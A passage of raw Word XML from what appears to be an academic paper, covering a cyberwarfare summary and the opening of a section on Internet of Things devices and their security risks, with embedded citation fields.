    </w:p>
    <w:p w14:paraId="37A0FC0C" w14:textId="77777777" w:rsidR="00DC3448" w:rsidRPr="00553C6F" w:rsidRDefault="00DC3448" w:rsidP="00DC3448">
      <w:pPr>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B08A565" w14:textId="4A9F2046" w:rsidR="0081670D" w:rsidRDefault="0081670D" w:rsidP="00B9708C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081670D">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cyberwarfare Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CE51D" w14:textId="20F3D103" w:rsidR="00F56BCC" w:rsidRDefault="00B9708C" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B9708C">
        <w:t>The cyber</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9708C">
        <w:t>warfare attacks discussed in this section of the paper</w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00511A86">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9708C">
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t xml:space="preserve"> a small selection of the attacks that have been made public by governments. In reality, attacks of this nature </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9708C">
        <w:t>are happening every</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9708C">
        <w:t xml:space="preserve">day around the globe </w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t xml:space="preserve">between </w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC" w:rsidRPr="00B9708C">
        <w:t>governments</w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t xml:space="preserve"> against each of their institutions for </w:t>
      </w:r>
      <w:r w:rsidR="00961746">
        <w:t>cyber espionage</w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t xml:space="preserve"> and vulnerability assessments in the event a ‘Cyberwar’ was to happen within the future. These cyberwarfare </w:t>
      </w:r>
      <w:r w:rsidR="003816C3">
        <w:t>attacks are</w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t xml:space="preserve"> not made public to the general public for national security reasons </w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t>and to also prevent widespread panic among</w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t xml:space="preserve"> the general population</w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t xml:space="preserve"> and companies</w:t>
      </w:r>
      <w:r w:rsidR="00F56BCC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00961746">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A067C2" w14:textId="2620C409" w:rsidR="00E168F2" w:rsidRDefault="00F56BCC" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Because of the real threat a</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> future</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘Cyberwar’ poses</w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t>from state</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t xml:space="preserve">sponsored </w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t>ATP groups</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t xml:space="preserve">western </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">governments  </w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve">around the globe are </w:t>
      </w:r>
      <w:r w:rsidR="00BB3B10">
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t>investing billions</w:t>
      </w:r>
      <w:r w:rsidR="00BB3B10">
        <w:t xml:space="preserve"> in taxpayers money within</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> cybersecurity vulnerability research and </w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t>analysis</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t>advanced hacking tool</w:t>
      </w:r>
      <w:r w:rsidR="009A3FB0">
        <w:t xml:space="preserve"> development</w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> training of </w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t>cybersecurity</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t>professionals, security</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> devices/measures</w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t xml:space="preserve"> and the upgrading of the security of </w:t>
      </w:r>
      <w:r w:rsidR="009E47A3">
        <w:t>LAN</w:t>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E47A3">
        <w:t xml:space="preserve"> and WAN</w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"http://www.ciscopress.com/articles/article.asp?p=2158215&amp;seqNum=6","abstract":"LAN and WAN","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"ciscopress.com","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ciscopress.com","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"page":"1","title":"LANs, WANs, and the Internet (1.3) &amp;gt; Exploring the Modern Computer Network: Types, Functions, and Hardware","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=bb2c5328-8906-31b3-8b29-e2cbe0c8b4c1"]}],"mendeley":{"formattedCitation":"[37]","plainTextFormattedCitation":"[37]","previouslyFormattedCitation":"[37]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BB5B08" w:rsidRPr="00BB5B08">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[37]</w:t>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t>national network infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="009E47A3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidR="009E47A3">
        <w:t>utilised</w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="009E47A3">
        <w:t xml:space="preserve"> access and </w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t>control the counties critical</w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t xml:space="preserve"> systems</w:t>
      </w:r>
      <w:r w:rsidR="00C22901">
        <w:t xml:space="preserve"> infrastructure </w:t>
      </w:r>
      <w:r w:rsidR="009E47A3">
        <w:t xml:space="preserve">from a Network Operations Control (NOC) </w:t>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"author":[{"dropping-particle":"al","family":"Metzler Ashton","given":"Jim et","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2018"]]},"number-of-pages":"1-20","title":"The Next Generation Network Operations Center How the Focus on Application Delivery is Redefining the NOC The Next Generation Network Operations Center How the Focus on Application Delivery is Redefining the NOC","type":"report"},"uris":["http://www.mendeley.com/documents/?uuid=a1a32299-db97-3796-9c36-d2394b158d4a"]}],"mendeley":{"formattedCitation":"[38]","plainTextFormattedCitation":"[38]","previouslyFormattedCitation":"[38]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BB5B08" w:rsidRPr="00BB5B08">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[38]</w:t>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E47A3">
        <w:t>centralised location</w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t xml:space="preserve"> as previously discussed, so western governments are</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t>prepared</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> in the event </w:t>
      </w:r>
      <w:r w:rsidR="009A3FB0">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00022BE6">
        <w:t xml:space="preserve"> future</w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t xml:space="preserve"> full scale</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t>‘Cyber</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t>war</w:t>
      </w:r>
      <w:r w:rsidR="00553C6F">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="0033185D">
        <w:t xml:space="preserve"> does take place.</w:t>
      </w:r>
      <w:r w:rsidR="00961746">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"1000142405274","abstract":"We journalists often have mixed feelings about what we report and write. Naturally, we like to see our reporting vindicated by events or other reporting. This makes us feel prescient. Still, we often feel bad, because what we’ve reported harms some group or society as a whole. That’s how I felt when I read a recent story in the Wall Street Journal headlined “Cyberwar ignites a new arms race.” In the past, I’ve argued that — contrary to conventional wisdom — the Internet does not represent “progress,” because its benefits are vastly overshadowed by its potential for social anarchy and global conflict. So far, that hasn’t happened on a significant scale — cyberattacks have mostly involved business and government spying — but the Wall Street Journal story suggests that broader conflicts are just a matter of time. It reports that “countries have begun to amass cyberweaponry on an unprecedented scale.” At least 29 countries “have formal military or intelligence units dedicated to offensive hacking efforts,” estimate Journal reporters Damian Paletta, Danny Yadron and Jennifer Valentino-DeVries. And 50 countries, including some of the 29, “have bought off-the-shelf hacking software.” This cyber arms race extends well beyond obvious combatants: the United States, China, Russia, Iran and North Korea. According to the Journal, India and Pakistan “regularly hack each other’s companies and governments.” Estonia and Belarus are said to be building “defensive shields to counter Russia.” Argentina, Denmark, France and the Netherlands are also mentioned as having developed “offensive” cyberweapons. What worries me most is not the spying — which, nevertheless, is costly, serious and embarrassing — but the potential for social disruption. Here, the Journal reports ominously, though vaguely: “Nation states have also looked into using cyberweapons to knock out electrical grids, disable domestic airline networks, jam Internet connectivity, erase money from bank accounts and confuse radar systems, experts believe.” Everyday life as we know it could be irreparably damaged if any of these dangers materialized. Imagine the public fears if large parts of the electric grid failed and, unlike outages from hurricanes and other natural disasters, could not be quickly or easily restored. History is hardly reassuring. In the past, new weapon technologies — the tank, the airplane, nuclear bombs — have changed the nature of warfare and international conflict. That is almost certainly ha…","author":[{"dropping-particle":"","family":"Paletta","given":"Damian","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yadron","given":"Danny","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Valentino-Devries","given":"Jennifer","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Wall Street Journal","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"Cyberwar Ignites a New Arms Race","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=c9d16c72-2aff-413c-9437-d78fce6f21b8"]}],"mendeley":{"formattedCitation":"[39]","plainTextFormattedCitation":"[39]","previouslyFormattedCitation":"[39]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BB5B08" w:rsidRPr="00BB5B08">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[39]</w:t>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B92900" w14:textId="77777777" w:rsidR="00C22901" w:rsidRDefault="00C22901" w:rsidP="00C22901">
      <w:pPr>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79824FFF" w14:textId="77777777" w:rsidR="002A443D" w:rsidRDefault="002A443D" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Internet of Things (IoT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FD6AA" w14:textId="04EDB4AA" w:rsidR="00113530" w:rsidRDefault="00BB5B08" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Gartner</w:t>
      </w:r>
      <w:r w:rsidR="002A443D">
        <w:t xml:space="preserve"> estimate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there will be 20</w:t>
      </w:r>
      <w:r w:rsidR="002A443D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>billion</w:t>
      </w:r>
      <w:r w:rsidR="002A443D">
        <w:t xml:space="preserve"> smart devices connected to the Internet around the globe</w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t xml:space="preserve"> are referred to as the IoT. These devices</w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t xml:space="preserve"> include; </w:t>
      </w:r>
      <w:r w:rsidR="00113530">
        <w:t>Cars,</w:t>
      </w:r>
      <w:r w:rsidR="004A0008">
        <w:t xml:space="preserve"> industrial components such as; oil and gas valves,</w:t>
      </w:r>
      <w:r w:rsidR="00113530">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t>surveillance video cameras, alarm systems, home entertainment devices</w:t>
      </w:r>
      <w:r w:rsidR="0045761C">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF3FC2">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="006B32E2">
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t xml:space="preserve">smart televisions and </w:t>
      </w:r>
      <w:r w:rsidR="004A0008">
        <w:t>voice</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004A0008">
        <w:t>controlled</w:t>
      </w:r>
      <w:r w:rsidR="00A75E8A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0030586F">
        <w:t xml:space="preserve">centralised </w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t>integrated</w:t>
      </w:r>
      <w:r w:rsidR="004A0008">
        <w:t xml:space="preserve"> music</w:t>
      </w:r>
      <w:r w:rsidR="0030586F">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="004A0008">
        <w:t xml:space="preserve">Internet searching devices like ‘Amazon </w:t>
      </w:r>
      <w:r w:rsidR="00792E92">
        <w:t>Alexa</w:t>
      </w:r>
      <w:r w:rsidR="004A0008">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00113530">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004A0008">
        <w:t xml:space="preserve"> smart</w:t>
      </w:r>
      <w:r w:rsidR="00113530">
        <w:t xml:space="preserve"> watches, air conditioning systems</w:t>
      </w:r>
      <w:r w:rsidR="00392033">
        <w:t>, garden sprinkler systems</w:t>
      </w:r>
      <w:r w:rsidR="00113530">
        <w:t>, kitchen appliances, baby monitors, child’s toys and many more.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Leading the IoT 2 The Internet of Things (IoT) has rapidly become one of the most familiar-and perhaps most hyped-expressions across business and technology. We expect to see 20 billion internet-connected things by 2020. These \"things\" are not general-purpose devices, such as smartphones and PCs, but dedicated-function objects, such as vending machines, jet engines, connected cars and a myriad of other examples. The IoT will have a great impact on the economy by transforming many enterprises into digital businesses and facilitating new business models, improving efficiency and increasing employee and customer engagement. However, the ways in which enterprises can actualize any benefits will be diverse and, in some cases, painful.","author":[{"dropping-particle":"","family":"gartner iot","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Leading the IoT","type":"report"},"uris":["http://www.mendeley.com/documents/?uuid=e45ba969-92e4-3d64-94ac-a85615c60a89"]}],"mendeley":{"formattedCitation":"[40]","plainTextFormattedCitation":"[40]","previouslyFormattedCitation":"[40]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00BB5B08">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[40]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D22AE41" w14:textId="77777777" w:rsidR="00113530" w:rsidRDefault="00113530" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1743D66F" w14:textId="06E1A120" w:rsidR="002A443D" w:rsidRDefault="00113530" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Although these</w:t>
      </w:r>
      <w:r w:rsidR="00BF3FC2">
        <w:t xml:space="preserve"> smart IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devised have many practical</w:t>
      </w:r>
      <w:r w:rsidR="00792E92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uses that assist people within their everyday lives</w:t>
      </w:r>
      <w:r w:rsidR="00441330">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by automating mundane</w:t>
      </w:r>
      <w:r w:rsidR="0030586F">
        <w:t xml:space="preserve"> and complex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tasks</w:t>
      </w:r>
      <w:r w:rsidR="00441330">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0030586F">
        <w:t>along with</w:t>
      </w:r>
      <w:r w:rsidR="00B67646">
        <w:t xml:space="preserve"> providing instantaneous </w:t>
      </w:r>
      <w:r w:rsidR="0030586F">
        <w:t>entrainment</w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t xml:space="preserve"> that are utilised by the general public for the  delegation of tasks in an ever-growing highly stressful global society</w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t xml:space="preserve"> that puts a lot of pressure on people whom work long hours that don’t have the time to perform chores at home and demand instantaneous entertainment in the little free time they have after </w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t xml:space="preserve">a long </w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t>day</w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0030586F">
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r w:rsidR="00476ADC">
        <w:t>devices</w:t>
      </w:r>
      <w:r w:rsidR="0030586F">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="00476ADC">
        <w:t xml:space="preserve"> have</w:t>
      </w:r>
      <w:r w:rsidR="00B67646">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C247A6">
        <w:t>large economic</w:t>
      </w:r>
      <w:r w:rsidR="00441330">
        <w:t xml:space="preserve"> benefits for companies</w:t>
      </w:r>
      <w:r w:rsidR="00BF3FC2">
        <w:t xml:space="preserve"> who utilise them</w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t xml:space="preserve"> which allows them to employ less staff</w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t xml:space="preserve"> with higher efficiency, production and </w:t>
      </w:r>
      <w:r w:rsidR="008A3508">
        <w:t xml:space="preserve">autonomous </w:t>
      </w:r>
      <w:r w:rsidR="00C55BC5">
        <w:t>monitoring capabilities</w:t>
      </w:r>
      <w:r w:rsidR="00BF3FC2">
        <w:t xml:space="preserve"> and also for the technology companies that produce</w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF3FC2">
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidR="00117FEE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00441330">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-981-13-3384-2_11","ISSN":"21903026","abstract":"This article describes how the Internet of Things (IoT) enables interaction and integration of real world things or objects—such as cars, electronic devices, homes, etc.—using various inter-operable communication protocols. This leads to a digital society of billions of devices that can sense, process, share, track, shop, chat and work in cooperative manner. There exist many challenges in the realization of IoT based distributed systems. This article intends to introduce various aspects of IoT such as views/visions, Architecture and protocols of IoT, communication technology, general requirements and various application domains. This article intends to disseminate the state-of-the-art multi-fold information on IoT to researchers, academicians, and student community.","author":[{"dropping-particle":"","family":"Lele","given":"Ajey","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Smart Innovation, Systems and Technologies","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"Internet of things (IoT)","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=13092ccc-7148-4d7d-a0c0-f9b5061ad947"]}],"mendeley":{"formattedCitation":"[41]","plainTextFormattedCitation":"[41]","previouslyFormattedCitation":"[41]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[41]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF430D9" w14:textId="77777777" w:rsidR="00117FEE" w:rsidRDefault="00117FEE" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF1C29D" w14:textId="10744C9A" w:rsidR="00EE4604" w:rsidRDefault="00117FEE" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidR="00A75E8A">
        <w:t>society has become so reliant on IoT devices that although</w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve"> they</w:t>
      </w:r>
      <w:r w:rsidR="00A75E8A">
        <w:t xml:space="preserve"> bring a lot of benefits and prosperity to companies and the general </w:t>
      </w:r>
      <w:r w:rsidR="00B72666">
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidR="00A75E8A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve">the malicious implications of IoT devices </w:t>
      </w:r>
      <w:r w:rsidR="00A75E8A">
        <w:t>are not fully understood by the consumers</w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A75E8A">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve">the devices they utilise on a daily bases may have security vulnerabilities that </w:t>
      </w:r>
      <w:r w:rsidR="00A75E8A">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve">be exploited by malicious actors in order to gain </w:t>
      </w:r>
      <w:r w:rsidR="00EE4604">
        <w:t>remote</w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve"> access to a device</w:t>
      </w:r>
      <w:r w:rsidR="00EE4604">
        <w:t xml:space="preserve"> across the Internet</w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve">, that would give the malicious actor the power </w:t>
      </w:r>
      <w:r w:rsidR="00EE4604">
        <w:t xml:space="preserve">to take control of the devices in order to spy or cause physical damage </w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve">to the environment where the device is located that could harm a person by </w:t>
      </w:r>
      <w:r w:rsidR="00EE4604">
        <w:t>utilising the real world applications that these devices are created for</w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidR="008A3508">
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="001331E5">
        <w:t xml:space="preserve"> manner</w:t>
      </w:r>
      <w:r w:rsidR="00EE4604">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
